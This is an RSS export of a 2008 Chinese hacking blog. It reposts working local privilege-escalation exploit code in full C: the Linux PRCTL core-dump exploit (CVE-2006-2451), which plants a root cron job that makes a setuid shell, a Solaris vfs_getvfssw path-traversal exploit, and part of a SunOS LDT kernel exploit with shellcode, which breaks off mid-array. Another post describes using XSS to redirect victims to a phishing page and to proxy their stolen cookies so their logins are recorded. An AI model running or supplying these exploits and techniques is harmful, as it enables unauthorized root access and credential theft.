<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0">
<channel>
<title><![CDATA[Goodwell 'Blog]]></title> 
<link>http://www.greenarmy.org/index.php</link> 
<description><![CDATA[]]></description> 
<language>zh-cn</language> 
<copyright><![CDATA[Goodwell 'Blog]]></copyright>
<item>
<link>http://www.greenarmy.org/post/16/</link>
<title><![CDATA[关于XSS 入侵的一些新思路]]></title> 
<author>goodwell &lt;admin@yourname.com&gt;</author>
<category><![CDATA[技术原创]]></category>
<pubDate>Tue, 01 Apr 2008 16:42:26 +0000</pubDate> 
<guid>http://www.greenarmy.org/post/16/</guid> 
<description>
<![CDATA[ 
	<br />2008 年 Xss 蠕虫也许会和 cookie 注入一样成为黑客入侵的最前沿。<br /><br />世面上流行的 xss 入侵无非是下面的几种方法 <br />这里我摘用Monyer 写的文章 大家可以具体去看看<br /><a href="http://www.hacker57.cn/article.asp?id=346">http://www.hacker57.cn/article.asp?id=346</a><br /><br />当我们跨站成功后 可以指定跳转我们的页面，如果这是个框架页面比如 index.htm <br />包括了两个页面 1 和 页面 2 (页面 2 是隐藏的）通过写在 页面2 里 简单的 js 程序 我们可以控制页面 1里面的 地址转向 <br />页面 1 先调用 用户正常访问的 页面 ，2分钟后 (通过页面2 的控制 跳转到指定的 密码输入钓鱼页面）<br /><br />步骤1 跳转载入 index.htm<br /><br /><a href="http://gw.8800.org/img/1.gif" target="_blank"><img src="http://gw.8800.org/img/1.gif" class="insertimage" alt="点击在新窗口中浏览此图片" title="点击在新窗口中浏览此图片" border="0"/></a><br /><br />步骤 2通过页面 2 内 JS 可以 控制 延迟4000 毫秒后 页面1 自动跳转（指跳转一次）4分钟后 用户页面自动跳转<br /><br /><a href="http://gw.8800.org/img/2.gif" target="_blank"><img src="http://gw.8800.org/img/2.gif" class="insertimage" alt="点击在新窗口中浏览此图片" title="点击在新窗口中浏览此图片" border="0"/></a><br /><br />你还可以使用 java 读取 框架内 页面1 内的数据 并定时记录。==============================================<br /><br />当然很多网站限制了 框架结构 会自动跳出这就需要利用另一个技术 HttpClient来模拟浏览器GET POSTXss<br /><br />跳转 并传递cookie获取cookie 后 利用 http client 技术 模拟用户访问 <br />他当前的页面获得用户正常访问的 页面代码同时替换所有 url<br />&nbsp;比如 把 src=http://www.qq.com/file/admin.asp<br />替换成 src=http://xxx.com/demo.jsp? url=http://www.qq.com/file/admin.asp<br />print 输出<br /><br />这时用户看到的是和原来页面一样的东西但是他这个时候的页面内的所有连接已经被我们替换，意味着他点击的连接会先连向我们的Demo.jsp 然后我们的 demo 会再此模拟他的cookie 去访问这些连接<br />Print 输出<br /><br />也许你问这样做的意义是什么？ <br />它可以记录用户从xss跳转后所有的 访问页面 和登陆信息
]]>
</description>
</item><item>
<link>http://www.greenarmy.org/post/14/</link>
<title><![CDATA[2.6.9 local root]]></title> 
<author>goodwell &lt;admin@yourname.com&gt;</author>
<category><![CDATA[笔记摘录]]></category>
<pubDate>Wed, 26 Mar 2008 19:38:54 +0000</pubDate> 
<guid>http://www.greenarmy.org/post/14/</guid> 
<description>
<![CDATA[ 
	/*****************************************************/<br/>/* Local r00t Exploit for:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; */<br/>/* Linux Kernel PRCTL Core Dump Handling&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; */<br/>/* ( BID 18874 / CVE-2006-2451 )&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; */<br/>/* Kernel 2.6.x&nbsp;&nbsp;(>= 2.6.13 && < 2.6.17.4)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; */<br/>/* By:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; */<br/>/* - dreyer&nbsp;&nbsp;&nbsp;&nbsp;<luna@aditel.org>&nbsp;&nbsp; (main PoC code)&nbsp;&nbsp; */<br/>/* - RoMaNSoFt <roman@rs-labs.com> (local root code) */<br/>/*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;[ 10.Jul.2006 ]&nbsp;&nbsp;*/<br/>/*****************************************************/<br/><br/>#include <stdio.h><br/>#include <sys/time.h><br/>#include <sys/resource.h><br/>#include <unistd.h><br/>#include <linux/prctl.h><br/>#include <stdlib.h><br/>#include <sys/types.h><br/>#include <signal.h><br/><br/>char *payload="&#92;nSHELL=/bin/sh&#92;nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin&#92;n* * * * *&nbsp;&nbsp; root&nbsp;&nbsp; cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core&#92;n";<br/><br/>int main() &#123; <br/>&nbsp;&nbsp;&nbsp;&nbsp;int child;<br/>&nbsp;&nbsp;&nbsp;&nbsp;struct rlimit corelimit;<br/>&nbsp;&nbsp;&nbsp;&nbsp;printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t&#92;n");<br/>&nbsp;&nbsp;&nbsp;&nbsp;printf("By: dreyer & RoMaNSoFt&#92;n");<br/>&nbsp;&nbsp;&nbsp;&nbsp;printf("[ 10.Jul.2006 ]&#92;n&#92;n");<br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;corelimit.rlim_cur = RLIM_INFINITY;<br/>&nbsp;&nbsp;&nbsp;&nbsp;corelimit.rlim_max = RLIM_INFINITY;<br/>&nbsp;&nbsp;&nbsp;&nbsp;setrlimit(RLIMIT_CORE, &corelimit);<br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;printf("[*] Creating Cron entry&#92;n");<br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;if ( !( child = fork() )) &#123;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;chdir("/etc/cron.d");<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;prctl(PR_SET_DUMPABLE, 2);<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;sleep(200);<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;exit(1);<br/>&nbsp;&nbsp;&nbsp;&nbsp;&#125;<br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;kill(child, SIGSEGV);<br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;printf("[*] Sleeping for aprox. one minute (** please wait **)&#92;n");<br/>&nbsp;&nbsp;&nbsp;&nbsp;sleep(62);<br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;printf("[*] Running shell (remember to remove /tmp/sh when finished) ...&#92;n");<br/>&nbsp;&nbsp;&nbsp;&nbsp;system("/tmp/sh -p");<br/>&#125;
]]>
</description>
</item><item>
<link>http://www.greenarmy.org/post/11/</link>
<title><![CDATA[7350 ]]></title> 
<author>goodwell &lt;admin@yourname.com&gt;</author>
<category><![CDATA[心情日志]]></category>
<pubDate>Tue, 26 Feb 2008 17:24:41 +0000</pubDate> 
<guid>http://www.greenarmy.org/post/11/</guid> 
<description>
<![CDATA[ 
	寻找失落的东西 teso
]]>
</description>
</item><item>
<link>http://www.greenarmy.org/post/10/</link>
<title><![CDATA[ettercap 出来起码有6年了  ]]></title> 
<author>goodwell &lt;admin@yourname.com&gt;</author>
<category><![CDATA[心情日志]]></category>
<pubDate>Tue, 26 Feb 2008 17:16:15 +0000</pubDate> 
<guid>http://www.greenarmy.org/post/10/</guid> 
<description>
<![CDATA[ 
	看看人家6年前的东西，鸡蛋没打破前谁都不知道怎么才能竖立在桌上。<br/>结果却这么简单 .<br/><br/>已经可以ARP 窃听后窜改截获的数据包然后发送 而且非常稳定<br/><br/> <br/><br/>============================================================================<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ettercap 0.6.5&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;2002-02-12<br/>============================================================================<br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;Even if blessed with a feeble intelligence they are cruel and smart...<br/><br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; @@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; @@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@@@&nbsp;&nbsp;&nbsp;&nbsp; @@@&nbsp;&nbsp; @@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@@&nbsp;&nbsp; @@ @@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@@&nbsp;&nbsp; @@ @@&nbsp;&nbsp; @@<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; @@@@@@&nbsp;&nbsp;&nbsp;&nbsp;@@@&nbsp;&nbsp;&nbsp;&nbsp; @@@&nbsp;&nbsp; @@@@@@&nbsp;&nbsp;@@@@@@&nbsp;&nbsp;@@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@@@@@@@ @@@@@@<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; @@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@@@&nbsp;&nbsp;&nbsp;&nbsp; @@@&nbsp;&nbsp; @@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@@&nbsp;&nbsp;@@&nbsp;&nbsp;@@&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@@&nbsp;&nbsp; @@ @@<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; @@@@@@@&nbsp;&nbsp; @@@&nbsp;&nbsp;&nbsp;&nbsp; @@@&nbsp;&nbsp; @@@@@@@ @@&nbsp;&nbsp;@@@ @@@@@@@ @@&nbsp;&nbsp; @@ @@<br/><br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Multi purpose sniffer/interceptor<br/><br/><br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Required Libraries:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;none ;)&nbsp;&nbsp;(optionally ncurses)<br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Optional Libraries:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;openssl&nbsp;&nbsp;(if you want ssh support)<br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Installation:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;configure<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;make<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;make install<br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (optional)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; make plug-ins<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;make plug-ins_install<br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(if you are lazy, just run)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; make complete_install<br/><br/>============================================================================<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;INTRO<br/>============================================================================<br/><br/>Kiddie:&nbsp;&nbsp; A friend of mine told me that it is possible to sniff on a LAN...<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;so I bought a switch ;)<br/><br/>NaGoR:&nbsp;&nbsp;&nbsp;&nbsp;mmhhh....<br/><br/>Kiddie:&nbsp;&nbsp; Now my LAN is SECURE ! you can't sniff my packets... ah ah ah<br/><br/>NaGoR:&nbsp;&nbsp;&nbsp;&nbsp;are you sure ? look at ettercap doing its work...<br/><br/>Kiddie:&nbsp;&nbsp; Oh my god... it sniffs all my traffic !!<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;I will use only ciphered connections on my LAN, so ettercap can't<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;sniff them ! ah ah ah<br/><br/>NaGoR:&nbsp;&nbsp;&nbsp;&nbsp;mmhhh....<br/><br/>Kiddie:&nbsp;&nbsp; Now I'm using SSH.&nbsp;&nbsp;My LAN is SECURE !<br/><br/>NaGoR:&nbsp;&nbsp;&nbsp;&nbsp;are you sure ? look at ettercap doing its work...<br/><br/>Kiddie:&nbsp;&nbsp; shit !!&nbsp;&nbsp;grrrr...<br/><br/><br/> "a false sense of security, is worse than insecurity"&nbsp;&nbsp; -- Steve Gibson<br/><br/> hey folks... wake up !&nbsp;&nbsp;the net is NOT secure !!<br/><br/> ettercap demonstrates that now is the time to encourage research on<br/> internet protocols to make them more secure.<br/><br/>
]]>
</description>
</item><item>
<link>http://www.greenarmy.org/post/9/</link>
<title><![CDATA[r00tme]]></title> 
<author>goodwell &lt;admin@yourname.com&gt;</author>
<category><![CDATA[笔记摘录]]></category>
<pubDate>Tue, 26 Feb 2008 17:12:12 +0000</pubDate> 
<guid>http://www.greenarmy.org/post/9/</guid> 
<description>
<![CDATA[ 
	/* rootme.c - Solaris vfs_getvfssw() Loadable Kernel Module Path Traversal Exploit<br/> * <br/> * Copyright (c) SST 2004 All rights reserved.<br/> *<br/> * Public version<br/> *<br/> * code by Sam and&nbsp;&nbsp;2004/04/07<br/> *&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<Sam@venustech.com.cn><br/> *&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <Sam@0x557.org><br/> *<br/> * bug find by Dave Aitel<br/> * http://www.immunitysec.com/downloads/solaris_kernel_vfs.sxw.pdf<br/> *<br/> *<br/> * some thanks/greets to:<br/> * sst members, Xfocus Guys, my gf :I<br/> * and everyone else who's KNOW SST ;P<br/> * http://0x557.org<br/> */<br/><br/>#include <stdio.h><br/>#include <sys/fstyp.h><br/>#include <sys/fsid.h><br/>#include <sys/types.h><br/>#include <unistd.h><br/><br/>int do_root_me ()<br/>&#123;<br/>&nbsp;&nbsp;if (mkdir("/tmp/sparcv9", 0777) < 0) &#123;<br/>&nbsp;&nbsp;&nbsp;&nbsp;perror ("mkdir");<br/>&nbsp;&nbsp;&nbsp;&nbsp;return -1;<br/>&nbsp;&nbsp;&#125;<br/>&nbsp;&nbsp;<br/>&nbsp;&nbsp;system ("cp ./mod /tmp/sparcv9/");<br/>&nbsp;&nbsp;<br/>&nbsp;&nbsp;sysfs (GETFSIND, "../../tmp/mod");<br/>&nbsp;&nbsp;<br/>&nbsp;&nbsp;return 0;<br/>&#125;<br/><br/>int make_shell ()<br/>&#123;<br/>&nbsp;&nbsp;system ("gcc -o sh sh.c;cp ./sh /tmp/sh;chmod 4755 /tmp/sh");<br/>&nbsp;&nbsp;return 0;<br/>&#125;<br/>&nbsp;&nbsp;<br/><br/>int main()<br/>&#123;<br/>&nbsp;&nbsp;pid_t&nbsp;&nbsp;child;<br/>&nbsp;&nbsp;<br/>&nbsp;&nbsp;make_shell ();<br/>&nbsp;&nbsp;child = fork ();<br/>&nbsp;&nbsp;if (child == -1)<br/>&nbsp;&nbsp;&nbsp;&nbsp;printf ("Unable to fork&#92;n");<br/><br/>&nbsp;&nbsp;if (child == 0)<br/>&nbsp;&nbsp;&nbsp;&nbsp;do_root_me();<br/>&nbsp;&nbsp;<br/>&nbsp;&nbsp;system("/usr/bin/rm -rf /tmp/sparcv9");<br/>&nbsp;&nbsp;printf ("press anykey ");&nbsp;&nbsp;<br/>&nbsp;&nbsp;getchar ();<br/>&nbsp;&nbsp;execl ("/tmp/sh", "/tmp/sh", 0);<br/>&nbsp;&nbsp;<br/>&nbsp;&nbsp;return 0;<br/>&#125;<br/><br/>
]]>
</description>
</item><item>
<link>http://www.greenarmy.org/post/8/</link>
<title><![CDATA[sunos root]]></title> 
<author>goodwell &lt;admin@yourname.com&gt;</author>
<category><![CDATA[笔记摘录]]></category>
<pubDate>Tue, 26 Feb 2008 17:11:35 +0000</pubDate> 
<guid>http://www.greenarmy.org/post/8/</guid> 
<description>
<![CDATA[ 
	老东西 随便记录一下<br/><br/>/*## copyright LAST STAGE OF DELIRIUM apr 2001 poland&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;*://lsd-pl.net/ #*/<br/>/*## ldt kernel bug&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#*/<br/><br/>/*&nbsp;&nbsp; the code installs trap call gate descriptor with DPL=3 targeting kernel&nbsp;&nbsp;*/<br/>/*&nbsp;&nbsp; code segment selector KCSSEL (DPL=0) in task local descriptor table LDT&nbsp;&nbsp;*/<br/>/*&nbsp;&nbsp; through sysi86(SI86DSCR,struct ssd*) system call.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;*/<br/><br/>/*&nbsp;&nbsp; as a result command shell is spawned with effective root user privilege. */<br/>/*&nbsp;&nbsp; NOTE: possible direct jump to user space adr=(unsigned int)&asmcode[21]; */<br/><br/>#include <sys/types.h><br/>#include <sys/sysi86.h><br/>#include <sys/segment.h><br/>#include <sys/cpuvar.h><br/>#include <sys/thread.h><br/>#include <sys/cred.h><br/>#include <ucontext.h><br/><br/>#define ofs(s,m) (unsigned int)(&(((s*)0)->m))<br/>#define ofskt()&nbsp;&nbsp;(ofs(cpu_t,cpu_thread))<br/>#define ofscr()&nbsp;&nbsp;(ofs(kthread_t,t_cred))<br/>#define ofsid()&nbsp;&nbsp;(ofs(cred_t,cr_uid))<br/>#define adr(a)&nbsp;&nbsp; (char)(a),(char)(a>>8),(char)(a>>16),(char)(a>>24)<br/>#define dsc(d)&nbsp;&nbsp; (char)(d),(char)(d>>8)<br/><br/>char asmcode[]=&#123;<br/>&nbsp;&nbsp; 0x55,&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;/* pushl&nbsp;&nbsp; %ebp&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; */<br/>&nbsp;&nbsp; 0x89,0xe5,&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; /* movl&nbsp;&nbsp;&nbsp;&nbsp;%esp,%ebp&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;*/<br/>&nbsp;&nbsp; 0xe8,0,0,0,0,&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;/* call&nbsp;&nbsp;&nbsp;&nbsp;<asmcode+8>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;*/ <br/>&nbsp;&nbsp; 0x5c,&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;/* popl&nbsp;&nbsp;&nbsp;&nbsp;%esp&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; */<br/>&nbsp;&nbsp; 0x83,0xc4,0x0d,&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;/* addl&nbsp;&nbsp;&nbsp;&nbsp;$0x0d,%esp&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; */<br/>&nbsp;&nbsp; 0x9a,0,0,0,0,0x44,0,&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; /* lcall&nbsp;&nbsp; $0x44,$0x00000000&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;*/<br/>&nbsp;&nbsp; 0xc9,&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;/* leave&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;*/<br/>&nbsp;&nbsp; 0xc3,&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;/* ret&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;*/<br/><br/>&nbsp;&nbsp; 0x66,0xb8,dsc(KGSSEL),&nbsp;&nbsp;&nbsp;&nbsp; /* movw&nbsp;&nbsp;&nbsp;&nbsp;$0x????,%ax&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;*/<br/>&nbsp;&nbsp; 0x8e,0xe8,&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; /* movw&nbsp;&nbsp;&nbsp;&nbsp;%ax,%gs&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;*/<br/>&nbsp;&nbsp; 0x65,0xa1,adr(ofskt()),&nbsp;&nbsp;&nbsp;&nbsp;/* movl&nbsp;&nbsp;&nbsp;&nbsp;%gs:0x????????,%eax&nbsp;&nbsp;&nbsp;&nbsp;*/<br/>&nbsp;&nbsp; 0x8b,0x88,adr(ofscr()),&nbsp;&nbsp;&nbsp;&nbsp;/* movl&nbsp;&nbsp;&nbsp;&nbsp;0x????????(%eax),%ecx&nbsp;&nbsp;*/<br/>&nbsp;&nbsp; 0x31,0xc0,&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; /* xorl&nbsp;&nbsp;&nbsp;&nbsp;%eax,%eax&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;*/<br/>&nbsp;&nbsp; 0x89,0x41,ofsid(),&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; /* movl&nbsp;&nbsp;&nbsp;&nbsp;%eax,0x??(%ecx)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;*/<br/>&nbsp;&nbsp; 